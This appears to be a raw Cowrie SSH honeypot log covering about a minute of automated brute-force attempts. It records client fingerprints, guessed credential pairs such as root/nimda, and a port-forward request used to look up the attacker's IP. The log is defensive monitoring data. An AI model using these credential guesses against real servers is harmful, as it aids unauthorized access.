{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":47176,"dst_ip":"1.2.3.4","dst_port":22,"session":"18f882b0dd1f","protocol":"ssh","message":"New connection: 68.183.87.241:47176 (1.2.3.4:22) [session: 18f882b0dd1f]","sensor":"my-vps","timestamp":"2025-08-26T04:11:00.118509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:11:00.119551Z","src_ip":"68.183.87.241","session":"18f882b0dd1f"}
{"eventid":"cowrie.session.closed","duration":"18.7","message":"Connection lost after 18.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:00.251284Z","src_ip":"212.227.235.229","session":"65cd1f713905"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:11:00.375579Z","src_ip":"68.183.87.241","session":"18f882b0dd1f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-26T04:11:00.711090Z","src_ip":"212.227.235.229","session":"8b17a79be5e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:11:01.476098Z","src_ip":"68.183.87.241","session":"18f882b0dd1f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:01.752566Z","src_ip":"68.183.87.241","session":"18f882b0dd1f"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:01.753759Z","src_ip":"68.183.87.241","session":"88b1514cf1b0"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:02.811071Z","src_ip":"212.227.235.229","session":"8b17a79be5e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40152,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cf058c1db21","protocol":"ssh","message":"New connection: 212.227.235.229:40152 (1.2.3.4:22) [session: 5cf058c1db21]","sensor":"my-vps","timestamp":"2025-08-26T04:11:09.528440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:11:10.220751Z","src_ip":"212.227.235.229","session":"5cf058c1db21"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:11:10.539062Z","src_ip":"212.227.235.229","session":"5cf058c1db21"}
{"eventid":"cowrie.login.success","username":"root","password":"nimda","message":"login attempt [root/nimda] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:11:13.010491Z","src_ip":"212.227.235.229","session":"5cf058c1db21"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:11:13.326253Z","session":"5cf058c1db21"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:11:13.588873Z","src_ip":"212.227.235.229","session":"5cf058c1db21"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:13.850612Z","src_ip":"212.227.235.229","session":"5cf058c1db21"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:16.253459Z","src_ip":"212.227.125.160","session":"70e929cd184c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:11:18.993428Z","src_ip":"212.227.235.229","session":"3e857664ed7b"}
{"eventid":"cowrie.login.failed","username":"thomas","password":"thomas","message":"login attempt [thomas/thomas] failed","sensor":"my-vps","timestamp":"2025-08-26T04:11:20.043073Z","src_ip":"212.227.235.229","session":"3e857664ed7b"}
{"eventid":"cowrie.session.closed","duration":"28.0","message":"Connection lost after 28.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:21.299969Z","src_ip":"212.227.235.229","session":"3e857664ed7b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60836,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf581c887169","protocol":"ssh","message":"New connection: 217.72.205.35:60836 (1.2.3.4:22) [session: bf581c887169]","sensor":"my-vps","timestamp":"2025-08-26T04:11:21.963561Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:21.964640Z","src_ip":"217.72.205.35","session":"bf581c887169"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36496,"dst_ip":"1.2.3.4","dst_port":22,"session":"d68b7f93bafd","protocol":"ssh","message":"New connection: 212.227.235.229:36496 (1.2.3.4:22) [session: d68b7f93bafd]","sensor":"my-vps","timestamp":"2025-08-26T04:11:27.307991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:11:27.481627Z","src_ip":"212.227.235.229","session":"d68b7f93bafd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:11:27.668166Z","src_ip":"212.227.235.229","session":"d68b7f93bafd"}
{"eventid":"cowrie.login.failed","username":"admian","password":"admin","message":"login attempt [admian/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:11:38.059079Z","src_ip":"212.227.235.229","session":"d68b7f93bafd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56936,"dst_ip":"1.2.3.4","dst_port":22,"session":"d82d3b24ce35","protocol":"ssh","message":"New connection: 212.227.235.229:56936 (1.2.3.4:22) [session: d82d3b24ce35]","sensor":"my-vps","timestamp":"2025-08-26T04:11:38.062654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:11:38.333456Z","src_ip":"212.227.235.229","session":"d82d3b24ce35"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:11:38.352506Z","src_ip":"212.227.235.229","session":"d82d3b24ce35"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:39.832788Z","src_ip":"212.227.235.229","session":"2741e71c6fb1"}
{"eventid":"cowrie.login.failed","username":"cf1c22","password":"cf1c22","message":"login attempt [cf1c22/cf1c22] failed","sensor":"my-vps","timestamp":"2025-08-26T04:11:40.892420Z","src_ip":"212.227.235.229","session":"d82d3b24ce35"}
{"eventid":"cowrie.session.closed","duration":"14.1","message":"Connection lost after 14.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:41.432352Z","src_ip":"212.227.235.229","session":"d68b7f93bafd"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:42.922495Z","src_ip":"212.227.235.229","session":"d82d3b24ce35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41210,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f32452b00cc","protocol":"ssh","message":"New connection: 212.227.235.229:41210 (1.2.3.4:22) [session: 0f32452b00cc]","sensor":"my-vps","timestamp":"2025-08-26T04:11:45.945729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:11:46.039416Z","src_ip":"212.227.235.229","session":"0f32452b00cc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:11:46.210498Z","src_ip":"212.227.235.229","session":"0f32452b00cc"}
{"eventid":"cowrie.login.failed","username":"testftp","password":"testftp","message":"login attempt [testftp/testftp] failed","sensor":"my-vps","timestamp":"2025-08-26T04:11:48.337665Z","src_ip":"212.227.235.229","session":"0f32452b00cc"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:11:49.614949Z","src_ip":"212.227.235.229","session":"0f32452b00cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56068,"dst_ip":"1.2.3.4","dst_port":22,"session":"835a3d445aa1","protocol":"ssh","message":"New connection: 212.227.235.229:56068 (1.2.3.4:22) [session: 835a3d445aa1]","sensor":"my-vps","timestamp":"2025-08-26T04:11:51.801781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:11:51.880763Z","src_ip":"212.227.235.229","session":"835a3d445aa1"}
